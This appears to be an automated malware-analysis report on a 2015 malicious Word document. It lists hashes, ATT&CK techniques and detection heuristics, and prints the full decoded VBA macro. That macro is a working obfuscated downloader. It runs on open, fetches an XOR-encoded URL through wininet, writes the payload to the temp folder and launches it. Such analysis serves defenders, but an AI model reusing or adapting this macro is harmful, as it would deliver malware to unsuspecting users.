Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d56f0483ffe05f3…

MALICIOUS

Office (OLE)

60.0 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-15
MD5: 2f5995ceb36a4d52b3bbdbebd15ea9e7 SHA-1: 2ffa3b42b1b0abff94e1184e865abc86d27214c0 SHA-256: 4d56f0483ffe05f36608ce7db51ffb489499d5c328a3dcf43d6551fd29603a79
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The presence of legacy WordBasic markers and the `autoopen` macro indicates an attempt to automatically execute code upon opening. The `CreateObject` call is a high-confidence indicator of malicious intent, typically used to instantiate objects for downloading or executing further stages. The VBA code is heavily obfuscated, making a precise determination of its final payload difficult, but the overall pattern suggests a downloader.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set C21C21C21 = CreateObject(C22C22C22)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7938 bytes
SHA-256: bb572f402661805f9921ddaf331f517decb7ff963ffef51c798a12cdc501f3fb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub InIn()
D22D22D22D22
End Sub

Sub autoopen()
InIn
End Sub


Attribute VB_Name = "FILE6"

Option Explicit
Public Const C1C1C1A = "D25D25D25D25"



Private Const D1D1D1D1 = 8162
Private Const D2D2D2D2 As String = "D3D3D3D3D3"
Private Const D4D4D4D4 = 1
Private Const D5D5D5D5 = &H4000000

Public Function C16C16C16 _
(ByVal D6D6D6D6 As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim D7D7D7D7 As LongPtr, D8D8D8D8 As LongPtr
    #Else
        Dim D7D7D7D7 As Long, D8D8D8D8 As Long
    #End If
    Dim D10D10D10D10 As Long
    Dim C33C33C33 As String * D1D1D1D1, D9D9D9D9 As String
    Dim D11D11D11D11 As Integer, D12D12D12D12 As Double
    D7D7D7D7 = C2C2C2(D2D2D2D2, D4D4D4D4, vbNullString, vbNullString, 0)
    If D7D7D7D7 = 0 Then
        Exit Function
    End If
    Dim FiGaMan As Boolean
    
    If D15D15D15D15(D8D8D8D8, D7D7D7D7) Then
    End If
    If D8D8D8D8 = 0 Then
        D12D12D12D12 = 0
    Else
        C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
        D9D9D9D9 = C33C33C33
        Do While D10D10D10D10 <> 0
            C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
            
            Dim Z1z1Z1z1Z1z1 As Integer
            
For Z1z1Z1z1Z1z1 = 110 _
To 111
If Z1z1Z1z1Z1z1 = 1000 Then _
End
Next Z1z1Z1z1Z1z1
            
            D9D9D9D9 = D9D9D9D9 + Mid(C33C33C33, 1, D10D10D10D10)
        Loop
            D12D12D12D12 = D13D13D13D13(D9D9D9D9): D11D11D11D11 = FreeFile
        Open D6D6D6D6 _
            For Binary Access Write _
        Lock Write _
        As #D11D11D11D11
        Put #D11D11D11D11, _
                , D9D9D9D9
        Dim S1s1S1s1S1s1S1s1 As _
        Long
            For S1s1S1s1S1s1S1s1 = 111 To 112
    If S1s1S1s1S1s1S1s1 = 2000 Then _
    End
Next S1s1S1s1S1s1S1s1
        Close #D11D11D11D11
    End If
    C1C1C1 D8D8D8D8
    C1C1C1 D7D7D7D7
    D9D9D9D9 = ""
    If D12D12D12D12 Then
        C16C16C16 = True
    End If
End Function


Public Function D13D13D13D13(D14D14D14D14 As String) As Long
D13D13D13D13 = Len(D14D14D14D14)
End Function


Attribute VB_Name = "PIDLE0"

#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
C1C1C1 Lib _
"wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
Public _
Declare _
PtrSafe _
Function _
C2C2C2 Lib _
"wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
Public _
Declare _
PtrSafe _
Function _
C3C3C3 Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
C4C4C4 Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
#Else
Public Declare Function C1C1C1 Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
Public Declare Function C2C2C2 Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
Public Declare Function C3C3C3 Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public Declare Function C4C4C4 Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
#End If




Public Function C21C21C21() As Object
Dim C22C22C22 As String
C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
Set C21C21C21 = CreateObject(C22C22C22)
End Function


Sub D22D22D22D22()
        Dim D23D23D23D23 As Long

    Dim D21D21D21D21S As Integer
For D21D21D21D21S = 1101 To 1110
If D21D21D21D21S = 1111 Then End
Next D21D21D21D21S
D23D23D23D23 = 111
D24D24D24D24 (D23D23D23D23)

End Sub

Attribute VB_Name = "IDL4"


Public Const C18C18C18 = "102B262F2F6A053434282D2725372A2C2D"
Public Const C19C19C19 = "1F2A3737263C30756A706A213C26"
Public Const C20C20C20 = "2B373733796B6B25282C253D2537222F222E222C6A272B296B7772756C7272776D232D22"
Public Const C10C10C10 = "1020312A33302D2A236A022D2826103A303726290B262E212730"
Public Const C9C9C9 = "CCCCCCDDDDDDDD"

Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
#If VBA7 _
    And Win64 Then
       Public Function D15D15D15D15(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
    #Else
       Public Function D15D15D15D15(ByRef CALIDA As Long, CALLA As Long) As Boolean
    #End If
Dim CALLIDORA As String
    CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
    
                CALIDA _
    = C4C4C4 _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    D5D5D5D5, 0)
    D15D15D15D15 = True
End Function



Attribute VB_Name = "M"


Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
End Function
Sub D24D24D24D24(CALEIGH As Long)

C25C25C25 ("CACACARDRDRDRD")
End Sub


Public Function C8C8C8(D16D16D16D16 As String, D17D17D17D17 As String) As String
    
    Dim D18D18D18D18 As Integer
    Dim D19D19D19D19 As Integer
    
    
    Dim W1w1W1w1W1w1W1w1 As _
    Long
For W1w1W1w1W1w1W1w1 = 1110 To 1111
If W1w1W1w1W1w1W1w1 = 1000 Then _
End
Next W1w1W1w1W1w1W1w1
    Dim D30D30D30D30 As Long
    D30D30D30D30 = D13D13D13D13(D17D17D17D17)
    D30D30D30D30 = D30D30D30D30 / 2
    Dim D20D20D20D20 As Long
    Dim D21D21D21D21 As String
    For D20D20D20D20 = 1 _
    To _
    D30D30D30D30
        D18D18D18D18 = Val("&H" & _
        (Mid$(D17D17D17D17, _
        (2 * D20D20D20D20) - 1, 2)))
        D19D19D19D19 = Asc(Mid$(D16D16D16D16, _
        ((D20D20D20D20 Mod D13D13D13D13(D16D16D16D16)) + 1), 1))
        D21D21D21D21 = D21D21D21D21 + Chr(D18D18D18D18 Xor D19D19D19D19)
    Next D20D20D20D20
   C8C8C8 = D21D21D21D21
End Function

Public Function C25C25C25(C24C24C24 As String)
C6C6C6
End Function

Public Function C6C6C6()

Dim C7C7C7  As Object
Set C7C7C7 = C21C21C21
Dim C11C11C11 As Object
Set C11C11C11 = C5C5C5(C7C7C7)

Dim C15C15C15
Dim C12C12C12
C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
C15C15C15 = C11C11C11 & C12C12C12


If CADY(C7C7C7, C15C15C15) Then
C7C7C7. _
DeleteFile C15C15C15
End If
If C16C16C16(C15C15C15) Then
End If
If CADY(C7C7C7, C15C15C15) Then
End If
Dim C17C17C17
Set C17C17C17 = CreateObject _
(C8C8C8 _
(C9C9C9, C18C18C18))
C17C17C17.Open C15C15C15
End Function



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AF9D3870-6EF5-41CB-B46D-5784EA7A2347}{8811CEEA-2C99-497E-823B-ECCB0AAE1CD4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{DD4C0798-F0D1-405D-89FD-12933BDBD567}{1C85D6B9-0A1E-47C1-B4FB-28136EB24322}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.